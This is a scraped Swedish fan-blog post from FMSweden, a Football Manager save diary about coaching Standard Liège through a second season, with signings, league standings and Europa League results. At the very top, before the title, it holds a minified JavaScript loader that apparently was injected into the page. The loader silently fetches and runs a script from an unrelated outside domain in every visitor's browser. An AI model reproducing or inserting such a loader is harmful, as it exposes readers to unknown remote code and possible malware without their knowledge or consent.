;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Dags att utmana på riktigt – FMSweden
Meny Stäng

Dags att utmana på riktigt

Andra säsongen med Standard Liége har precis dragit igång. Sportchef Danne har haft fullt upp med att rensa truppen på dödkött och plockat in två extremt spännande spelare i vänsteryttern Juan Pedro Canete och högerbacken Carlos Esteban. 

Säsongen har börjat bra och med 9 matcher spelade ligger vi på en godkänd tredjeplats i ligan. En poäng bakom Cercle Brügge deras rivaler från Club Brügge.

I Europa League kvalade vi enkelt in till gruppspelet efter 5-2 totalt mot danska AGF Århus. Grupperna lottades och Monaco, Zenit S:t Petersburg och FK Sarajevo blev motståndarna.

Första matchen vann vi hemma mot Sarajevo med hela 8-1 och ytterligare en supertalang presenterade sig. Italienske 17-åringen Mattia Torin gjorde hela 5 mål i matchen.

I ligan har vi trampat igång bra, enda förlusten kom borta mot serieledande Cercle Brügge och det var efter att vi roterat lite efter en match mot Zenit borta i Ryssland. Vi vann 3-2 och efter 0-0 hemma mot Monaco, leder vi gruppen i EL och är på väg mot slutspel.

Vi snackade ihop oss lite jag och sportchefen innan säsongen och kom fram till, att nu var det dags att utmana på riktigt. Vi ska minst en stor titel med oss i bagaget denna säsongen. Tydligen räckte inte belgiska supercupen, för den vann vi tidigt med 3-1 mot Club Brügge.

Höga krav på tränare Bagis uppifrån, men med spelarna som Herr Nilsson har värvat in, är det inte mer än rätt. Återstår att se hur det går.

Trevlig helg på er kamrater.

SKÅL

Tobbe

Please wait...

Liknande Inlägg

3 kommentarer

Lämna ett svar